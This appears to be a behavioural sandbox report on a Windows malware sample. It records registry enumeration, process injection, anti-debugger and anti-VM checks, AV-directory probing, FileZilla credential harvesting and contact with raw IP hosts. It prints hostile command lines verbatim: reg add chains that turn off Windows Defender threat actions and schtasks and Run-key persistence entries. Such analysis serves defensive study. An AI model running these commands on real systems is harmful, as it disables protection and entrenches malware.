RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Terminates another process (6 events)

Time & API	Arguments	Status
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2808 process_handle: 0x00000494
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2808 process_handle: 0x00000494	1
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2752 process_handle: 0x00000494
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2752 process_handle: 0x00000494	1
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2120 process_handle: 0x00000494
NtTerminateProcess June 15, 2024, 8:21 a.m.	status_code: 0xffffffff process_identifier: 2120 process_handle: 0x00000494	1

Uses Windows utilities for basic Windows functionality (18 events)

cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline	forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
cmdline	cmd /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline	forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Communicates with host for which no DNS query was performed (5 events)

host	147.45.47.126
host	147.45.47.155
host	185.172.128.19
host	185.215.113.67
host	77.91.77.81

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 3016 region_size: 5447680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000380		3221225496
NtAllocateVirtualMemory June 15, 2024, 8:21 a.m.	process_identifier: 3232 region_size: 364544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0
NtAllocateVirtualMemory June 15, 2024, 8:22 a.m.	process_identifier: 2288 region_size: 364544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000248	1	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 692 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA June 15, 2024, 8:20 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA June 15, 2024, 8:20 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA June 15, 2024, 8:21 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA June 15, 2024, 8:21 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA June 15, 2024, 8:21 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA June 15, 2024, 8:21 a.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (8 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\a2772ea559.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000016001\a2772ea559.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
file	C:\Windows\Tasks\axplong.job
file	C:\Windows\Tasks\explortu.job
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewKindR.exe /TR "C:\Users\test22\AppData\Local\Temp\1000064001\NewKindR.exe" /F

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2828 manipulating memory of non-child process 3016
NtAllocateVirtualMemory June 15, 2024, 8:20 a.m.	process_identifier: 3016 region_size: 5447680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000380		3221225496	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 15, 2024, 8:21 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà¶À@@öx0S÷.textrµ¶ `.rdata7*Ð,º@@.data0.æ@À.relocS0T@B base_address: 0x00400000 process_identifier: 3232 process_handle: 0x00000248	1	1
WriteProcessMemory June 15, 2024, 8:21 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3232 process_handle: 0x00000248	1	1
WriteProcessMemory June 15, 2024, 8:22 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà¶À@@öx0S÷.textrµ¶ `.rdata7*Ð,º@@.data0.æ@À.relocS0T@B base_address: 0x00400000 process_identifier: 2288 process_handle: 0x00000248	1	1
WriteProcessMemory June 15, 2024, 8:22 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2288 process_handle: 0x00000248	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 15, 2024, 8:21 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà¶À@@öx0S÷.textrµ¶ `.rdata7*Ð,º@@.data0.æ@À.relocS0T@B base_address: 0x00400000 process_identifier: 3232 process_handle: 0x00000248	1	1	0
WriteProcessMemory June 15, 2024, 8:22 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELã_fà¶À@@öx0S÷.textrµ¶ `.rdata7*Ð,º@@.data0.æ@À.relocS0T@B base_address: 0x00400000 process_identifier: 2288 process_handle: 0x00000248	1	1	0

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 15, 2024, 8:22 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
